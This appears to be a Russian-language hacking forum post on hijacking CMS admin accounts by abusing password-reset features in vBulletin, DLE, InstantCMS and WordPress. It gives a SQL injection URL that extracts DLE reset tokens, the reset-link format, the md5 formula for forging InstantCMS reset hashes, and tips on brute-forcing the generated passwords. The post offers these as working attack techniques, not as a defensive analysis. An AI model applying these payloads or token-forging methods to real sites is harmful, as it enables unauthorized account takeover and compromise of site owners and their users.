Способ так-же подходит для VB - при восстановлении устанавливается новый 8-ми символьный цифровой пароль, который сбрутить не составит труда, хэши в ссылке на восстановление не используются.

Потом хэш можно вернуть на изначальный, только вот письмо из почты админа никуда не денется, хотя возможно в других двигах есть свои нюансы.

Версию не уточнял!

DLE:

1) http://site/?do=lostpassword (via email)

2) use bug:

http://site/script.php?video=-49674'+union+select+1,2,lostid,4,5,6,7+from+dle_lo stdb+where+lostname='1'--+

В данном случае, lostname - это ID пользователя - обычно админ

3)переход по линку:

http://site/index.php?do=lostpassword&action=password&douser=1 &lostid=a05e0f74df705f0a1e3ab0803f82a7fd046214d 5

4) Генерится 11 символьный пароль из loweralpha и digit. Причем, есть шанс, что сгенеренный пароль будет only 11 digit's

P.S Лично у меня 11 lenght DIGIT simblols EGB обходит перебором за пару минут.

Instant CMS v1.9

CСсылка формируется согласно шаблону:

Query -

SELECT *, DATE_FORMAT(logdate, '%d-%m-%Y-%H-%i-%s') as logdate FROM cms_users WHERE email = 'email' LIMIT 1

Непосредственно вычисление хеша:

$usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate']);

В результате прямой линк на сброс пароля принимает вид:

http://site/registration/remind/bbd4da8d02433a6bdea3d3019458f951

Далее в форме вводим новый пароль:подтверждение.

P.S. В stable что лежит на офф сайте код в алгоритм формирования ссылки в конец добавляется константа PATH ( $_SERVER['DOCUMENT_ROOT'])

Like this:

$usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate'].PATH);

wp 3.4.2. прокатило

WP 3.9.1 и выше (может и ниже) - ключ активации хешируется.

20 символов [a-zA-Z0-9] - проще хеш админа подобрать...